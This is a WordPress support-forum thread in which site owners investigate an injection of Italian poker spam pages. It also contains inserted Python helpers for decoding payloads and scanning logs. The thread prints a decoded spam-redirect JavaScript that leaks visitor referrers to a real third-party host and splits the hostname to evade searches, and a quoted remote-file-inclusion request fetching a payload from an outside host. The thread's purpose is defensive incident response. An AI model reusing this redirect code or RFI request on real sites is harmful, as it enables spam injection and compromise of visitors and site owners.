• griffman

    (@griffman)


    [Note: I edited this post to contain the full .js file]

    Tonight, while checking my site backup’s sync log, I noticed a folder named “1” in the output, residing at the top level of the wp-content folder. Within the “1” folder, there are 71 separate files — 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content’s index.php file (which just says ‘silence is golden’) had also been edited or replaced — but the only change is a blank line on row one. My site itself wasn’t hacked — all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the “1” folder.

    I checked my sftp, ftp, and access logs, and there’s nothing suspicious there at all — which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, nothing seemed out of whack (there are no references to “poker.html” in any of the log files, for instance). The g.js file contains one “var str” definition that’s ASCII encoded; I decoded it and got this output (line breaks added for readability):

    var referer = escape(document.referrer);
    var fromd   = escape(document.location);
    document.write("<fram"+"eset frame"+"border=0 frames"+"pacing=0 border=0 rows=\"1"+"00%, *\"noresize><fr"+"ame name=\"online\" src=\""+
                   fid+"&q="+q1+"&referer="+referer+"&l="+lang+"&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

    That means nothing at all to me. Here’s the full .js file, with the “var str” bit removed, given it’s shown above:

    // Decode(): "str" holds the payload as '#'-separated decimal character codes.
    // Each number is turned back into one character and the result is written into the page.
    function Decode()
    {
    var temp="",i,c=0,out="";
    var str="118#97#114#32#..."; // truncated in this post; the full string decodes to the text shown above
    var l=str.length;
    while(c<=str.length-1)
      {
      // collect digits up to the next '#', then emit that character code
      while(str.charAt(c)!='#')
      temp=temp+str.charAt(c++);
      c++;
      out=out+String.fromCharCode(temp);
      temp="";
      }
    document.write(out);
    }

    // r(): the HTML pages call this with a keyword, category and language. It sets the
    // variables the decoded payload expects (note the hostname is split into pieces, so a
    // search of the file for the full domain finds nothing) and then runs Decode().
    function r(keyw, cat, lang)
    {
    document.write("<script language='javascript'>");
    document.write("var fid='https://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"'; var lang='"+lang+"'; var subacc='"+cat+"';");
    Decode();
    document.write("<\/script>");
    }

    In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

    <a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

    I’m not sure if the JavaScript works (somehow?) with that last URL, but that’s all that’s in each file (I’ll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the “1” folder and associated HTML files.

    My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins — and that’s where my suspicions lie for the most likely culprit. However, I don’t have any idea how to go about figuring out how someone got in … nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I’d welcome it!

    thanks;
    -rob.
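An added example, not the OP’s g.js or anything from the thread: a small Python helper that does what the OP did by hand, decoding the ‘#’-separated character codes and folding the split string literals in r() back together, so the hostname that a plain search of the file misses becomes visible. The sample g.js text, hostname and payload below are constructed placeholders.

```python
import re

# Constructed sample modelled on the g.js quoted above: the payload is stored as
# '#'-separated decimal character codes, and the hostname handed to the frame is
# split across string literals. Hostname and payload here are placeholders.
SAMPLE_PAYLOAD = "var fromd = escape(document.location);"
SAMPLE_STR = "#".join(str(ord(ch)) for ch in SAMPLE_PAYLOAD) + "#"
SAMPLE_GJS = (
    'function Decode()\n{\nvar temp="",i,c=0,out="";\nvar str="' + SAMPLE_STR + '";\n'
    '/* decoding loop as in the post */\n}\n'
    'function r(keyw, cat, lang)\n{\n'
    'document.write("var fid=\'https://www.exam"+"ple.inv"+"alid/feb.php?2\'; '
    'var q1=\'"+keyw+"\';");\nDecode();\n}\n'
)

HASH_STR_RE = re.compile(r'var\s+str\s*=\s*"([0-9#]+)"')
# two adjacent double-quoted literals joined by '+', with no escapes inside them
CONCAT_RE = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def decode_hash_string(encoded):
    """Mirror Decode(): every '#'-terminated decimal number is one character code."""
    return "".join(chr(int(part)) for part in encoded.split("#") if part)


def join_split_literals(js):
    """Fold "ab"+"cd" back into "abcd" until nothing changes."""
    # The split is an anti-grep trick: the raw file never contains the full hostname.
    previous = None
    while previous != js:
        previous = js
        js = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def analyse_gjs(js):
    """Return the decoded payload(s) and every URL visible after de-obfuscation."""
    joined = join_split_literals(js)
    decoded = [decode_hash_string(s) for s in HASH_STR_RE.findall(joined)]
    urls = set(URL_RE.findall(joined))
    for text in decoded:
        urls.update(URL_RE.findall(text))
    return {"decoded": decoded, "urls": sorted(urls)}
```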

Viewing 14 replies - 16 through 29 (of 29 total)
  • TheTim

    (@thetim)

    I just discovered the same issue on my site, which is running WordPress 2.3.3. Whooami, you say that this was resolved, but I don’t see any explanations of what can be done to prevent it from happening again? The permissions on my wp-content folder are already set to 755.

    So what’s the solution to this?

    whooami

    (@whooami)

    I have blogged about what I have done in repairing previously hacked sites on my own blog. This isn’t a directory permission issue; it never has been one. People that suggest otherwise aren’t aware of how the exploits are being used.

    This thread was resolved because the OP contacted me privately. The underlying issue is hardly resolved, because WP users with compromised sites aren’t taking the necessary steps to ensure their sites are made secure.

    1> https://www.village-idiot.org/archives/2008/03/18/wordpress-spam-inject-honeypot/

    2> https://www.village-idiot.org/archives/2008/03/19/wordpress-spam-inject-honeypot-2/

    mvandemar

    (@mvandemar)

    “This thread was resolved because…”

    This thread is not actually resolved, since a clean install of 2.3.3 has this vulnerability as well. While changing the cookie names may indeed thwart whatever bot it is that is currently pushing out this exploit, I can promise you that it is a stopgap at best.

    raygene

    (@raygene)

    If your wp-content directory is still writable, fix that.

    chmod 755.

    That’s one of the first things I would be doing. I’ve argued against plugins and settings that require that for three years.

    OK, just did that, thanks.

    Will the 755 permissions interfere with the plugins?

    Gene

    whooami

    (@whooami)

    I’ve offered to help set up $_POST logging for anyone who is interested in coming to more definitive conclusions regarding any of the hacked sites and their causes. For people who are so terribly concerned, I’ve gotten few replies.

    I’ve contacted 10 or so admins privately about their hacked installs — no replies, the blogs remain exploited, and not surprisingly, the admins keep posting. In other words, they seemingly don’t care.

    The OP in this thread was contacted by a developer as well as getting help from me, and since it’s his thread, and his problem was solved, the thread is resolved. The rest of you are “hangers on” who aren’t adding anything meaningful to the fray, in my opinion.

    Here is the offer again, if you think fresh installs of 2.3.3 are vulnerable, then set up $_POST logging and see what happens. If you need to know how to do that, contact me off list.

    Secondly, Apache logs all $_GET requests, which would clearly show RFI attacks that are called like so:

    archives/2006/06/29/wp-chunk//wp-content/plugins/sniplets/modules/syntax_highlight.php?variable_removed=https://americanpsycho.net/new/id.txt?

    Instead of standing by and waiting for someone else to take some initiative, start looking at things, and start being proactive instead of reactive.
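An added example, not whooami’s or anyone else’s code from the thread: a small Python pass over Apache combined-format access log lines that flags the RFI request shape quoted above (a GET parameter whose value is itself a URL) and lists which addresses POSTed to wp-login.php. The log lines, IP addresses, attacker host and parameter name are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache combined log format. The third line has the shape
# of the RFI request quoted above, with a placeholder host and parameter name in
# place of the real ones; the addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Mar/2008:02:14:07 +0000] "GET /wp-login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2008:02:14:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Mar/2008:02:15:30 +0000] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?some_param=http://attacker.invalid/id.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
192.0.2.44 - - [18/Mar/2008:02:16:01 +0000] "GET /archives/2006/06/29/wp-chunk/ HTTP/1.1" 200 9021 "http://www.google.it/" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# match on the scheme prefix only: the trailing '?' in the quoted request stays
# attached to the value, so a whole-value comparison would miss it
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def parse_log(text):
    """Parse combined-format lines; lines that do not match are skipped, not guessed at."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def rfi_candidates(records):
    """Flag GET parameters whose (URL-decoded) value is itself a remote URL."""
    hits = []
    for rec in records:
        parts = urlsplit(rec["target"])
        for name, value in parse_qsl(parts.query):
            value = unquote(value)
            if REMOTE_RE.match(value):
                hits.append({"ip": rec["ip"], "time": rec["time"], "script": parts.path,
                             "param": name, "remote": value})
    return hits


def login_posts(records):
    """Addresses that POSTed to wp-login.php; the POST body itself is not in the access log."""
    return sorted({r["ip"] for r in records
                   if r["method"] == "POST" and r["target"].startswith("/wp-login.php")})
```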

    whooami

    (@whooami)

    I will share some info on the wp-content/1 thing in an attempt to get some synapses firing.

    The OP provided myself and a developer his Apache logs.

    Looking inside his logs, it was clear where and when the actual upload of the files took place. It was also clear what file was being used to accomplish the upload.

    There were a couple things that stood out to me though.

    First, there were hits to wp-login.php immediately prior to the upload. Were they successful logins from a subscriber? (The OP has only one administrator account.) From a forged cookie? I don’t know, since we don’t see $_POST variables in Apache logs.

    Secondly, they wrote content to wp-content/index.php, and in turn that content precipitated a call to another file, which was responsible for grabbing all the uploaded content and unpacking it.

    I can tell you that the calls to the WordPress file in question result in you being immediately redirected to wp-login.php.

    whooami

    (@whooami)

    Actually, after taking another look at the OP’s logs — it’s clear that the login was successful. There are 11 log entries spanning three minutes; they start with a login and end with a call to a core WP file that cannot be called unless you are logged in. In between, there are calls to the same core WP file, and one file is created that appears responsible for the uploaded content.

    zdes

    (@zdes)

    One of my clients just pointed out the same problem. After some investigation I found something that piqued my curiosity…

    At the root of /wp-content/ was a folder named “advanced-cache.php”; any attempt to open it or change the permissions would result in an FTP error. Renaming it was allowed, though, but it would not let me download it. Finally, after trying this and that, I was able to open it using the FTP browser built into Firefox… I was able to delete this file by creating a new directory, moving it there, and deleting the new directory.

    Here are the contents:
    —– BEGIN

    time() ) {
        $meta = new CacheMeta;
        if (! ($meta = unserialize(@file_get_contents($meta_pathname))) ) return;
        foreach ($meta->headers as $header) { header($header); }
        $log = "\n";
        if ( !($content_size = @filesize($cache_file)) > 0 || $mtime < @filemtime($cache_file)) return;
        if ($meta->dynamic) {
            include($cache_file);
        } else {
            /* No used to avoid problems with some PHP installations
            $content_size += strlen($log);
            header("Content-Length: $content_size");
            */
            if(!@readfile ($cache_file)) return;
        }
        echo $log;
        die;
    }
    $file_expired = true; // To signal this file was expired
    }

    function wp_cache_postload() {
        global $cache_enabled;
        if (!$cache_enabled) return;
        require(ABSPATH . 'wp-content/plugins/wp-cache/wp-cache-phase2.php');
        wp_cache_phase2();
    }

    function wp_cache_get_cookies_values() {
        $string = '';
        while ($key = key($_COOKIE)) {
            if (preg_match("/^wordpress|^comment_author_email_/", $key)) {
                $string .= $_COOKIE[$key] . ",";
            }
            next($_COOKIE);
        }
        reset($_COOKIE);
        return $string;
    }
    ?>

    —–

    We are on WP 2.1.3 – with a whole lot of plugins,
    wp-content CHMODed to 755

    zdes

    (@zdes)

    Oops, advanced-cache.php is a symlink for wp-cache, DO NOT delete it! It will break WP.

    This happened to me too; is there any way to tell what caused it?

    I believe my WP site is included in these numbers = ( of sites attacked.
    I discovered the problem early yesterday morning by happenstance, as I don’t go merrily tromping through my source code too often (not being a “tech guy” with the full-on “tech guy know-how” to fall back on, I never thought it a safe thing to fool around in).

    As it stands, the normal guy I ask when something tech comes up is stumped and, possibly because his own WP sites aren’t affected, hasn’t really looked into it as far as I am trying. So I’ve been pretty stressed out about this.

    I deleted the attack from the 2 sections in the presentation edit area I found it in (header and footer PHP respectively), and other than furiously searching for any signs on the internet that would point to “I’ve done enough and the problem is fixed” or “I deleted just the visible part of the problem and future danger from this cyber rape (sorry, it’s how I feel about it = /) is on the horizon”.

    Any help, info, or anything really (even some cyber condolences lol) would be most helpful.
    I’m still looking out there and I still have a few links yet to check out, so wish me luck, and I hope all of you affected as well have managed or are managing to contain the damage.
    Thanks in advance.

    I just wanted to thank whooami for helping us to sort out the same issue with our site. I probably made the problem worse by trying to fix it myself.

    I’m really clueless when it comes to blogs. Whooami did a great job figuring out the problem, rapidly fixing it & suggesting ways to keep it from happening again.

    Thanks Whooami!

    you’re welcome

    now, that’s what I call fast!

  • The topic ‘My site was ambushed…need help figuring out how’ is closed to new replies.